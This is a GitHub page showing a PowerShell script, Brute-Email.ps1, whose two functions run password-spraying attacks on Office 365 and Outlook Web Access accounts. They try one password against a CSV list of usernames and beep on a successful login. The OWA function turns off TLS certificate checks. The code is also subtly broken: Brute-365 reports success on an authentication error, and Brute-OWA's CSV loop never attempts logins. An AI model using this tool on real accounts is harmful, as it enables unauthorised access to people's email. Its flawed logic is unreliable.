-
Notifications
You must be signed in to change notification settings - Fork 213
/
Copy pathBrute-Email.ps1
188 lines (168 loc) · 5.97 KB
/
Brute-Email.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
function Brute-365 {
<#
.SYNOPSIS
Attempts to login to Office 365 accounts using the Azure PowerShell module
Author: Steve Borosh (@424f424f)
Required Dependencies: Azure PowerShell module containing "Connect-Msolservice". http://connect.microsoft.com/site1164/Downloads/DownloadDetails.aspx?DownloadID=59185
Optional Dependencies: None
.DESCRIPTION
Using a csv with a header column of "Username", iterates through each user
attempting to log into the Office 365 service. Note: at the time of writing
this module, there is no default account lockout. However, system administrators
may enable lockout thresholds. Has optional parameter to beep when a login is successful
.EXAMPLE
Brute-365 -csv .\targets.csv -Password "Winter2016!" -Beep
#>
Param(
[Parameter(Mandatory=$False)]
[String]$csv,
[Parameter(Mandatory=$False)]
[String]$Username,
[Parameter(Mandatory=$True)]
[String]$Password = $Null,
[Parameter(Mandatory=$False)]
[Switch]$Beep
)
if (!$Username) {
if (!$csv) {
Write-Output "A username or CSV is required! Exiting.."
Break
}
$usernames = Import-CSV $csv
foreach($user in $usernames) {
$username = $($user.Username)
$secpasswd = ConvertTo-SecureString $password -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ($username, $secpasswd)
$connect = Connect-MsolService -Credential $mycreds
if ($connect -contains 'Authentication Error') {
Write-Output "Logon Successful for $username"
if ($Beep) {
[console]::beep(2000,500)
}
}
}
}
}
function Brute-OWA {
<#
.SYNOPSIS
Attempts to login to Outlook Web Access accountse
Author: Gowdhaman Karthikeyan, Steve Borosh (@424f424f)
Reference: https://blogs.technet.microsoft.com/meamcs/2015/03/06/powershell-script-to-simulate-outlook-web-access-url-user-logon/
Required Dependencies: PowerShellv3
Optional Dependencies: None
.DESCRIPTION
Using a csv with a header column of "Username", iterates through each user
attempting to log into the Outlook Web Access. Note: at the time of writing
this module, there is no default account lockout. Beware of account lockout!
Has optional parameter to beep when a login is successful.
.EXAMPLE
Brute-OWA -csv .\targets.csv -Password "Winter2016!" -Beep
#>
# https://blogs.technet.microsoft.com/meamcs/2015/03/06/powershell-script-to-simulate-outlook-web-access-url-user-logon/
Param(
[Parameter(Mandatory=$true)]
[String]$URL,
[Parameter(Mandatory=$true)]
[String]$Domain,
[Parameter(Mandatory=$false)]
[String]$csv,
[Parameter(Mandatory=$False)]
[String]$Username,
[Parameter(Mandatory=$true)]
[String]$Password,
[Parameter(Mandatory=$False)]
[Switch]$Beep
)
#Initialize default values
$Result = $False
$StatusCode = 0
$Latency = 0
if (!$Username) {
if (!$csv) {
Write-Output "A username or CSV is required! Exiting.."
Break
}
$usernames = Import-CSV $csv
foreach($user in $usernames) {
$username = $($user.Username)
write-host "here" $username
}
}
$Username = $Domain + "\" + $Username
try {
#########################
#Work around to Trust All Certificates is is from this post
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
public bool CheckValidationResult(
ServicePoint srvPoint, X509Certificate certificate,
WebRequest request, int certificateProblem) {
return true;
}
}
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
#Initialize Stop Watch to calculate the latency.
Write-Output $username
#Invoke the login page
$Response = Invoke-WebRequest -Uri $URL -SessionVariable owa
#Login Page – Fill Logon Form
if ($Response.forms[0].id -eq "logonform") {
$Form = $Response.Forms[0]
$Form.fields.username= $Username
$form.Fields.password= $Password
$authpath = "$URL/auth/owaauth.dll"
#Login to OWA
$Response = Invoke-WebRequest -Uri $authpath -WebSession $owa -Method POST -Body $Form.Fields
#SuccessfulLogin
if ($Response.forms[0].id -eq "frm") {
#Retrieve Status Code
$StatusCode = $Response.StatusCode
# Logoff Session
$logoff = "$URL/auth/logoff.aspx?Cmd=logoff&src=exch"
$Response = Invoke-WebRequest -Uri $logoff -WebSession $owa
#Calculate Latency
$Result = $True
}
#Fill Out Language Form, if it is first login
elseif ($Response.forms[0].id -eq "lngfrm") {
$Form = $Response.Forms[0]
#Set Default Values
$Form.Fields.add("lcid",$Response.ParsedHtml.getElementById("selLng").value)
$Form.Fields.add("tzid",$Response.ParsedHtml.getElementById("selTZ").value)
$langpath = "$URL/lang.owa"
$Response = Invoke-WebRequest -Uri $langpath -WebSession $owa -Method $form.Method -Body $form.fields
#Retrieve Status Code
$StatusCode = $Response.StatusCode
# Logoff Session
$logoff = "$URL/auth/logoff.aspx?Cmd=logoff&src=exch"
$Response = Invoke-WebRequest -Uri $logoff -WebSession $owa
$Result = $True
}
elseif ($Response.forms[0].id -eq "logonform") {
#We are still in LogonPage
#Retrieve Status Code
$StatusCode = $Response.StatusCode
#Calculate Latency
$Result = "Failed to logon $username. Check the password or account."
}
}
}
#Catch Exception, If any
catch
{
#Retrieve Status Code
$StatusCode = $Response.StatusCode
if ($StatusCode -notmatch '\d\d\d') {$StatusCode = 0}
$Result = $_.Exception.Message
}
Write-Output "Result: $Result"
if ($Result -notcontains "Failed") {
if ($Beep) {
[console]::beep(2000,500)
}
}
}